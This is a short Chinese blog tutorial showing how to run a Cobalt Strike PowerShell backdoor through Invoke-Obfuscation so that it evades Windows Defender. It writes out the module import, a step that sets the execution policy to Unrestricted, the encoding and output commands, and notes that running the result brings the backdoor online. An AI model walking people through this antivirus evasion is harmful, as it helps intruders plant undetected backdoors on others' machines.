Invoke-Obfuscation混淆ps文件绕过Windows_Defender

前提#
powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。
所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

混淆#
1.Cobaltstrike制作ps1后门文件
2.进入Invoke-Obfuscation
Copy
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Invoke-Obfuscation混淆ps文件绕过Windows_Defender

可能会报错?!
win10 x64系统 Import-Module 无法加载文件,提示此系统上禁止运行脚本。
Invoke-Obfuscation混淆ps文件绕过Windows_Defender

解决
管理员权限下运行:Set-ExecutionPolicy Unrestricted
Invoke-Obfuscation混淆ps文件绕过Windows_Defender

3.设置ps1文件进行混淆
Copy
set scriptpath E:…\Invoke-Obfuscation_PowerShell\payload.ps1
encoding
1
Invoke-Obfuscation混淆ps文件绕过Windows_Defender

4.输出文件
out 1.ps1
Invoke-Obfuscation混淆ps文件绕过Windows_Defender

然后运行 powershell 1.ps1 或 ./1.ps1,接收端就上线了。

上线#
Invoke-Obfuscation混淆ps文件绕过Windows_Defender

powershell是一款很强大的工具,且很多原生不经过任何处理的ps后门文件都能轻松绕过杀软。如不使用,对于安全意识较弱的同学可以删除系统 powershell.exe 程序。

作者: 素时听风

出处:https://www.cnblogs.com/sstfy/p/10440301.html

版权:本文采用「署名-非商业性使用-相同方式共享 4.0 国际」知识共享许可协议进行许可。